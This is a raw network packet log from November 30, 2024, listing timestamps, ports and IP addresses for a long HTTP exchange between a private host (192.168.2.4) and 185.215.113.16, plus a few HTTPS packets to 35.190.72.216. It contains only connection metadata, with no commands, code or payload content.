Nov 30, 2024 04:06:45.559206009 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.559942007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.559986115 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.560132027 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.560229063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.560904980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.561064959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.561078072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.561091900 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.561491966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.562450886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.562499046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.562632084 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.562680960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.563488007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.563530922 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.563610077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.563760042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.564327955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.564372063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.564505100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.564551115 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.565349102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.565392971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.565664053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.565713882 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.566313028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.566432953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.566468000 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.566503048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.567240000 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.567285061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.567420959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.567471981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.567769051 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.567820072 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.568032980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.568083048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.568497896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.568547964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.568617105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.568664074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.569534063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.569600105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.569657087 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.569704056 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.570533991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.570555925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.570575953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.570586920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.571454048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.571470976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.571511984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.571624994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.572293997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.572336912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.572413921 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.572460890 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.572612047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.572659016 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.573072910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.573111057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.573901892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.573916912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.573949099 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.573957920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.574594021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.574642897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.574722052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.574774027 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.575400114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.575447083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.575527906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.575577021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.576313972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.576360941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.576498032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.576541901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.577279091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.577331066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.577456951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.577471018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.577485085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.577503920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.577527046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.577581882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.577630997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.693473101 CET	443	49857	35.190.72.216	192.168.2.4
Nov 30, 2024 04:06:45.693552017 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:45.702996969 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:45.703003883 CET	443	49857	35.190.72.216	192.168.2.4
Nov 30, 2024 04:06:45.703126907 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:45.703155041 CET	443	49857	35.190.72.216	192.168.2.4
Nov 30, 2024 04:06:45.703258991 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:45.705723047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.705782890 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.705835104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.705885887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.706180096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.706227064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.706280947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.706326962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.707114935 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.707160950 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.707217932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.707257032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.708122969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.708172083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.708312035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.708358049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.709037066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.709089994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.709141970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.709208965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.710011959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.710056067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.710095882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.710144997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.710964918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.711052895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.714534044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.734395981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.734563112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.734884977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.734986067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.735862017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.736057997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.736829042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.736875057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.736921072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.736951113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.736963034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.737765074 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.737873077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.738732100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.738831043 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.739685059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.739726067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.739729881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.739993095 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.740647078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.740695000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.740762949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.740803957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.741607904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.741692066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.741753101 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.742561102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.742624044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.742664099 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.742708921 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.743510962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.743566036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.743613005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.743664026 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.744484901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.744599104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.744863987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.745436907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.745556116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.745784044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.746426105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.746479034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.746521950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.746644020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.747350931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.747394085 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.747459888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.747508049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.748301983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.748351097 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.748389959 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.748435974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.749264002 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.749315977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.749383926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.749452114 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.750247955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.750298977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.750340939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.750387907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.751185894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.751238108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.751281977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.751329899 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.752161980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.752207994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.752254963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.752341032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.753108025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.753158092 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.753215075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.753258944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.754067898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.754115105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.754167080 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.754215002 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.755038023 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.755117893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.755146027 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.755558968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.756002903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.756057024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.756117105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.756172895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.756946087 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.757000923 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.757045984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.757114887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.757898092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.757994890 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.758014917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.758063078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.758881092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.758927107 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.758956909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.759260893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.759849072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.759978056 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.759996891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.760066986 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.760783911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.760911942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.761405945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.761756897 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.761866093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.762702942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.762782097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.763700962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.763838053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.764254093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.764667988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.764703989 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.764818907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.764872074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.765645981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.765786886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.766588926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.766716003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.767522097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.767647982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.768476009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.768582106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.769438028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.769514084 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.770404100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.770509005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.771352053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.771446943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.771797895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.772073984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.772310972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.772418022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.772442102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.772459984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.773267984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.773370028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.774220943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.774346113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.775196075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.775298119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.776164055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.776273966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.777053118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.777111053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.777226925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.778058052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.792036057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.907027006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.907087088 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.907097101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.907143116 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.907433987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.907481909 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.907542944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.907591105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.908397913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.908483982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.908505917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.908550024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.909353018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.909429073 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.909462929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.909512997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.910317898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.910365105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.910427094 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.910475016 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.911268950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.911318064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.911389112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.911484003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.912241936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.912291050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.912302017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.912344933 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.935791969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.935838938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.935844898 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.935873032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.936182976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.936229944 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.936315060 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.936362028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.937129974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.937273026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.937350988 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.938091040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.938142061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.938252926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.938297033 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.939043999 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.939090014 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.939162016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.939210892 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.940022945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.940079927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.940141916 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.940196991 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.940948009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.940996885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.941063881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.941159010 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.941930056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.941977978 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.942018032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.942065001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.942881107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.942930937 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.942997932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.943067074 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.943850994 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.943895102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.944030046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.944077015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.944781065 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.944830894 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.944910049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.944956064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.945765972 CET	80	49840	185.215.113.16	192.168.2.4
